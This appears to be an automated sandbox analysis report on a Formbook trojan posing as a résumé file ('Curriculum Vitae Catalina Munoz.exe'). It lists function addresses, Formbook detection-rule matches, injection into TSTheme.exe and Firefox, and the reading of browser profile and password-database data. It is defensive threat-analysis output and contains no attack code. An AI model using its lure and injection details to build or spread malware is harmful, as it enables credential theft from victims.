Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015BFCF2		2_2_015BFCF2
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015BFF09		2_2_015BFF09
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014C3FD5		2_2_014C3FD5
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014C3FD2		2_2_014C3FD2
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01501F92		2_2_01501F92
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015BFFB1		2_2_015BFFB1
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01509EB0		2_2_01509EB0
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04BA592C		14_2_04BA592C
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04BA76D9		14_2_04BA76D9
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04BC4F59		14_2_04BC4F59
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04BA78F9		14_2_04BA78F9
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04BAE019		14_2_04BAE019
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04BA5979		14_2_04BA5979
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Code function: 14_2_04BA5972		14_2_04BA5972
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05110535		15_2_05110535
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051D0591		15_2_051D0591
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051C2446		15_2_051C2446
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051BE4F6		15_2_051BE4F6
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05134750		15_2_05134750
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05110770		15_2_05110770
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0510C7C0		15_2_0510C7C0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0512C6E0		15_2_0512C6E0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051AA118		15_2_051AA118
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05100100		15_2_05100100
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05198158		15_2_05198158
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051D01AA		15_2_051D01AA
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051C81CC		15_2_051C81CC
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051A2000		15_2_051A2000
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CA352		15_2_051CA352
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0511E3F0		15_2_0511E3F0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051D03E6		15_2_051D03E6
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051B0274		15_2_051B0274
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051902C0		15_2_051902C0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0511AD00		15_2_0511AD00
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05128DBF		15_2_05128DBF
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0510ADE0		15_2_0510ADE0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05110C00		15_2_05110C00
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051B0CB5		15_2_051B0CB5
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05100CF2		15_2_05100CF2
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05130F30		15_2_05130F30
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05152F28		15_2_05152F28
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05184F40		15_2_05184F40
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0518EFA0		15_2_0518EFA0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05102FC8		15_2_05102FC8
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0511CFE0		15_2_0511CFE0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CEE26		15_2_051CEE26
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05110E59		15_2_05110E59
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05122E90		15_2_05122E90
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CCE93		15_2_051CCE93
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CEEDB		15_2_051CEEDB
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05126962		15_2_05126962
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051129A0		15_2_051129A0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051DA9A6		15_2_051DA9A6
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0511A840		15_2_0511A840
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05112840		15_2_05112840
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_050F68B8		15_2_050F68B8
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0513E8F0		15_2_0513E8F0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CAB40		15_2_051CAB40
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051C6BD7		15_2_051C6BD7
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0510EA80		15_2_0510EA80
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051C7571		15_2_051C7571
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051AD5B0		15_2_051AD5B0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CF43F		15_2_051CF43F
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05101460		15_2_05101460
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CF7B0		15_2_051CF7B0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051C16CC		15_2_051C16CC
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051DB16B		15_2_051DB16B
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0514516C		15_2_0514516C
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_050FF172		15_2_050FF172
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0511B1B0		15_2_0511B1B0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051170C0		15_2_051170C0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051BF0CC		15_2_051BF0CC
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051C70E9		15_2_051C70E9
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CF0E0		15_2_051CF0E0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051C132D		15_2_051C132D
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_050FD34C		15_2_050FD34C
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0515739A		15_2_0515739A
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051152A0		15_2_051152A0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0512B2C0		15_2_0512B2C0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051B12ED		15_2_051B12ED
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051C1D5A		15_2_051C1D5A
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05113D40		15_2_05113D40
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051C7D73		15_2_051C7D73
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0512FDC0		15_2_0512FDC0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05189C32		15_2_05189C32
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CFCF2		15_2_051CFCF2
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CFF09		15_2_051CFF09
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05111F92		15_2_05111F92
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CFFB1		15_2_051CFFB1
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05119EB0		15_2_05119EB0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051A5910		15_2_051A5910
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05119950		15_2_05119950
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0512B950		15_2_0512B950
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0517D800		15_2_0517D800
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051138E0		15_2_051138E0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CFB76		15_2_051CFB76
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0512FB80		15_2_0512FB80
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05185BF0		15_2_05185BF0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_0514DBF9		15_2_0514DBF9
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051CFA49		15_2_051CFA49
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051C7A46		15_2_051C7A46
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05183A6C		15_2_05183A6C
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_05155AA0		15_2_05155AA0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051ADAAC		15_2_051ADAAC
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_051BDAC6		15_2_051BDAC6
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_02FD19D0		15_2_02FD19D0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_02FEA450		15_2_02FEA450
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_02FD3510		15_2_02FD3510
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_02FCCBD0		15_2_02FCCBD0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_02FCAE70		15_2_02FCAE70
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_02FCAE69		15_2_02FCAE69
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 15_2_02FCCDF0		15_2_02FCCDF0

Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: String function: 0518F290 appears 105 times
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: String function: 050FB970 appears 272 times
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: String function: 0517EA12 appears 86 times
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: String function: 05145130 appears 57 times
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: String function: 05157E54 appears 100 times
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: String function: 0157F290 appears 105 times
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: String function: 014EB970 appears 277 times
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: String function: 01535130 appears 58 times
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: String function: 0156EA12 appears 86 times
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: String function: 01547E54 appears 111 times

Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1208080989.00000000074E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Curriculum Vitae Catalina Munoz.exe
Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000000.1185445435.0000000000AC6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWrNb.exeF vs Curriculum Vitae Catalina Munoz.exe
Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1210757792.0000000008E70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Curriculum Vitae Catalina Munoz.exe
Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1202755559.000000000106E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Curriculum Vitae Catalina Munoz.exe
Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1204596679.000000000413A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Curriculum Vitae Catalina Munoz.exe
Source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTSThemeS.exej% vs Curriculum Vitae Catalina Munoz.exe
Source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTSThemeS.exej% vs Curriculum Vitae Catalina Munoz.exe
Source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000015ED000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Curriculum Vitae Catalina Munoz.exe
Source: Curriculum Vitae Catalina Munoz.exe	Binary or memory string: OriginalFilenameWrNb.exeF vs Curriculum Vitae Catalina Munoz.exe

Source: Curriculum Vitae Catalina Munoz.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Curriculum Vitae Catalina Munoz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, OxYXTBPtl3LAaaTJsD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.435ffc0.3.raw.unpack, OxYXTBPtl3LAaaTJsD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, OxYXTBPtl3LAaaTJsD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	Security API names: _0020.AddAccessRule

Source: 0.2.Curriculum Vitae Catalina Munoz.exe.2e2aed4.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.7500000.5.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.2e3aeec.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/1@16/12

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: C:\Windows\SysWOW64\TSTheme.exe

File created: C:\Users\user~1\AppData\Local\Temp\63u1Q-P

Jump to behavior

Source: Curriculum Vitae Catalina Munoz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Curriculum Vitae Catalina Munoz.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TSTheme.exe, 0000000F.00000002.3660319790.0000000003559000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1647254707.0000000003559000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3660319790.0000000003566000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1646951828.0000000003538000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3660319790.000000000358A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Curriculum Vitae Catalina Munoz.exe	ReversingLabs: Detection: 63%
Source: Curriculum Vitae Catalina Munoz.exe	Virustotal: Detection: 56%

Source: unknown	Process created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Process created: C:\Windows\SysWOW64\TSTheme.exe "C:\Windows\SysWOW64\TSTheme.exe"
Source: C:\Windows\SysWOW64\TSTheme.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Process created: C:\Windows\SysWOW64\TSTheme.exe "C:\Windows\SysWOW64\TSTheme.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: dwrite.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: windowscodecs.dll			Jump to behavior
